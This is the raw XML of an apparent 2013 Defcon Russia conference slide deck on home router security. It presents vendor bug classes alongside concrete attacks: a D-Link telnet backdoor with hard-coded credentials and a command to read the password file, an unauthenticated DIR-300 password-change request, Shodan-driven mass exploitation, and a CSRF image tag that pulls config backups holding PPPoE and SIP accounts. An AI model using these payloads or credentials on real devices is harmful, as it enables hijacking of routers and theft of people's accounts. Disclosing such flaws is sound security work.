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60" r:id="rId6"/>
    <p:sldId id="271" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="276" r:id="rId19"/>
    <p:sldId id="277" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="278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0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-1656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5E4-3CE9-4FDB-9984-51370051D97E}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>10.08.2013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67EC-5922-4860-8F10-FD0D97EEE8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42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267EC-5922-4860-8F10-FD0D97EEE89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20199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494982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79412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759333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989526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343016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7940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560677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912879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3011619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65745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99B5-1C1F-4587-BE3E-16ABA0A4CD99}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>10.08.2013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jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.jpeg"/><Relationship Id="rId9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u="sng" dirty="0" smtClean="0"/>
              <a:t>router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trike="sngStrike" dirty="0" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" strike="sngStrik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28180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@090h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de-DE" dirty="0" err="1"/>
              <a:t>cherboff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DCG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#7812</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9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115888"/>
            <a:ext cx="1262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3429000"/>
            <a:ext cx="492535" cy="803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WPAPSK.default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = 76543210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3905" r="-1390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D-Link.telnet_backd00r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telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>192.168.1.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>login: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>Alphanetworks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password: wrgn23_dlwbr_dir300b </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> /var/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>httpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>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.:REAL_GAME_RULES:.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DEFAULT_AUTH=  { ‘admin’: [‘admin’, ‘1234’]}	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>USERS_NEVER_UPDATE = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ANTIVIRUS_SOFTWATE = None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ONEBUG_EXPLOIT_TARGETS = [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D-Link’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetGear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1"/>
              <a:t>Linksys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PLATFOTM = {‘ARCH’: ‘MIPS’, ‘OS’: ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>LiNUX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UID = 0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Dir300.no_auth_password_change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POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://192.168.1.1:80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tools_admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP/1.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: 192.168.1.2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep-Alive: 115 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type: 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Content-length: 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ACTION_POST=LOGIN&amp;LOGIN_USER=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a&amp;LOGIN_PASSWD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>b&amp;login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Log+In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NO_NEED_AUTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1&amp;AUTH_GROUP=0&amp;admin_name=admin&amp;admin_password1=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uhOHahEh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ONE_BUG_ARMY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ru-RU" dirty="0" smtClean="0"/>
              <a:t>*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Text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ONE_BUG_ARMY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ru-RU" dirty="0" smtClean="0"/>
              <a:t>*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Text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DIR300.py + SHODAN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Tl1vvtv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3180" r="-43180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one CSRF story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ttp://www.wl.price.ua/bazar/img/5956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492896"/>
            <a:ext cx="5953125" cy="2838450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="http://www.allthingschristmas.com/pics/fibre_Optic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77276"/>
            <a:ext cx="2627784" cy="2780724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3080" name="Picture 8" descr="http://www.internetsales.ru/wp-content/uploads/2012/03/Starikam-zdes-ne-mes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772816"/>
            <a:ext cx="2961247" cy="2232248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3082" name="Picture 10" descr="http://ovsem.org/wp-content/uploads/2012/05/stariy-telef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1700808"/>
            <a:ext cx="3336240" cy="2232248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3084" name="Picture 12" descr="http://www.sprinter.ru/pic/big/41996c6407edc1512e790a160cc435d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4221088"/>
            <a:ext cx="1728192" cy="2429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1965965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D-Link DPN-5402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412776"/>
            <a:ext cx="5842992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admin/admin…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C:\Users\G8B28~1.CHE\AppData\Local\Temp\SNAGHTML3e3b99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916832"/>
            <a:ext cx="5670629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Wooot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 descr="C:\Users\G8B28~1.CHE\AppData\Local\Temp\SNAGHTML3e683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196752"/>
            <a:ext cx="7296150" cy="5029201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Овал 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="4941168"/>
            <a:ext cx="2520280" cy="576064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.:VENDORS:.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VENDORZ = [	‘D-Link’, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			‘TP-Link’, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			‘ASUS’,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ZyXEL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’,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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NetGear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			‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1"/>
              <a:t>Linksys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			…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]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3968" y="404664"/>
            <a:ext cx="2088232" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>YES!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844824"/>
            <a:ext cx="6682412" cy="401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915816" y="404664"/>
            <a:ext cx="1512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CSRF?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916832"/>
            <a:ext cx="6437965" cy="413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latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Evil Plan.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ru-RU" sz="5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http://www.wl.price.ua/bazar/img/5956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5085184"/>
            <a:ext cx="1812282" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3789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085184"/>
            <a:ext cx="987497" cy="1008112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37893" name="Picture 5" descr="http://cf.ltkcdn.net/web-design/images/std/37910-400x300-Popup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2348880"/>
            <a:ext cx="1584176" cy="1188132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Стрелка вправо 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="5445224"/>
            <a:ext cx="129614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67744" y="177281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Evil WEB site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60" y="573325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CSRF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Двойная стрелка влево/вправо 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18109999">
            <a:off x="1388214" y="4179875"/>
            <a:ext cx="1600974" cy="3099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894" name="Picture 6" descr="C:\Users\g.cherbov\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ATHA0TZ7\MC90042479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2276872"/>
            <a:ext cx="1708150" cy="1778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372200" y="170080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Evil FTP server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7896" name="Picture 8" descr="C:\Users\g.cherbov\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\II85GRQ4\MC900434844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8064" y="4797152"/>
            <a:ext cx="710809" cy="710809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868144" y="508518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Config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C 0.0592 -0.10139 0.1184 -0.20255 0.14323 -0.23982 C 0.16806 -0.27708 0.14688 -0.23611 0.14879 -0.22361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build="allAtOnce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&lt;IMG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=“http://192.168.0.1/goform/cbBackupCfg...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3xplo1T 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;-)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1844824"/>
            <a:ext cx="4427984" cy="3960440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/>
              <a:t> Network conf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Usless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> stuff conf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PPPOE account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> SIP account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Config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трелка вправо 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14136407">
            <a:off x="4695342" y="3337296"/>
            <a:ext cx="157630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4109469">
            <a:off x="5641952" y="5105565"/>
            <a:ext cx="157630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2736651">
            <a:off x="6569505" y="4567838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верх/вниз 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2422248">
            <a:off x="5872741" y="2876912"/>
            <a:ext cx="360040" cy="25922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Telephony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10" descr="http://ovsem.org/wp-content/uploads/2012/05/stariy-telef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373216"/>
            <a:ext cx="1614310" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43014" name="Picture 6" descr="http://savepic.net/2282315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052736"/>
            <a:ext cx="2304256" cy="1728192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Двойная стрелка вверх/вниз 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="2780928"/>
            <a:ext cx="360040" cy="25922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012" name="Picture 4" descr="http://www.g9e.ru/img/125416108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356992"/>
            <a:ext cx="1512168" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 2" descr="http://www.wl.price.ua/bazar/img/59560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5301208"/>
            <a:ext cx="1661258" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Облако 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076056" y="3573016"/>
            <a:ext cx="2016224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6" descr="C:\Users\g.cherbov\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ATHA0TZ7\MC90042479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8" y="1268760"/>
            <a:ext cx="1708150" cy="1778000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Двойная стрелка влево/вправо 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20943253">
            <a:off x="2571331" y="5709675"/>
            <a:ext cx="129614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35696" y="49411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23928" y="49411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876256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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 2" descr="http://www.wl.price.ua/bazar/img/59560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336" y="5229200"/>
            <a:ext cx="792088" cy="377668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 2" descr="http://www.wl.price.ua/bazar/img/595606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240" y="6165304"/>
            <a:ext cx="1094135" cy="521684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 2" descr="http://www.wl.price.ua/bazar/img/595606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23928" y="2276872"/>
            <a:ext cx="1208187" cy="576064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847856" y="47971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067944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948264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2-12-85-06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26" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="22" grpId="1"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="34" grpId="1"/>
      <p:bldP spid="34" grpId="2"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="35" grpId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1844824"/>
            <a:ext cx="5400600" cy="3960440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/>
              <a:t> SIP account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Not attached 2 device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Can be used anywhere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Stealed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> via stupid CSRF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Phone number is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1844824"/>
            <a:ext cx="5400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fin.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5736" y="1844824"/>
            <a:ext cx="5400600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$&gt;Questions?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Defcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Russia (DCG #7812)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71600" y="40466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8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.:SERVICES:.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SERVICES = [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HTTP, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			TELNET,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SSH, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			DNS,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			UPNDP,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DHCP,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			TFTP 4 RECOVERY,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]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191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.:BUGZ:.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ROUTER_VULN_TYPES = [ WPS,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			COMMAND_INJECTION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PLAIN_TEXT_PASSWORDS,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INFO_LEAK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BUFFER_OVERFLOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,	</a:t>
            </a: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AUTH_BYPASS,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			CSRF,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XSS,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			VENDOR_BACKDORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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MEANWHILE IN RUSSIA</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ZyXEL.popular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507" r="3507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234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MEANWHILE IN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RUSSIA </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Link.popular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18" r="218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1201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MEANWHILE IN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RUSSIA</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>D-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Link.popular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21945" b="-2194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149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TP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Link.XSSED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5565" r="556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DIR-300? REALY??!!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Defcon Russia (DCG #7812)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Picture 2" descr="C:\Users\Alexej\Desktop\tr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6477" y="1852"/>
            <a:ext cx="737523" cy="7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tumblr_inline_mkwkzhn6rH1rc6sl7.gi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90" b="1090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31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1447</TotalTime>
  <Words>417</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>182</Paragraphs>
  <Slides>27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Black</vt:lpstr>
      <vt:lpstr>Home router  security</vt:lpstr>
      <vt:lpstr>.:VENDORS:.</vt:lpstr>
      <vt:lpstr>.:SERVICES:.</vt:lpstr>
      <vt:lpstr>.:BUGZ:. </vt:lpstr>
      <vt:lpstr>MEANWHILE IN RUSSIA ZyXEL.popular</vt:lpstr>
      <vt:lpstr>MEANWHILE IN RUSSIA  TP-Link.popular</vt:lpstr>
      <vt:lpstr>MEANWHILE IN RUSSIA D-Link.popular</vt:lpstr>
      <vt:lpstr>TP-Link.XSSED</vt:lpstr>
      <vt:lpstr>DIR-300? REALY??!!</vt:lpstr>
      <vt:lpstr>WPAPSK.default = 76543210</vt:lpstr>
      <vt:lpstr>D-Link.telnet_backd00r</vt:lpstr>
      <vt:lpstr>.:REAL_GAME_RULES:.</vt:lpstr>
      <vt:lpstr>Dir300.no_auth_password_change</vt:lpstr>
      <vt:lpstr>ONE_BUG_ARMY</vt:lpstr>
      <vt:lpstr>ONE_BUG_ARMY</vt:lpstr>
      <vt:lpstr>DIR300.py + SHODAN</vt:lpstr>
      <vt:lpstr>Yet one CSRF story</vt:lpstr>
      <vt:lpstr>D-Link DPN-5402</vt:lpstr>
      <vt:lpstr>Wooot?</vt:lpstr>
      <vt:lpstr>YES!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Presentation_Name</dc:title>
  <dc:creator>Глеб Чербов</dc:creator>
  <cp:lastModifiedBy>Глеб Чербов</cp:lastModifiedBy>
  <cp:revision>83</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-08-10T08:46:14Z</dcterms:modified>
</cp:coreProperties>
</file>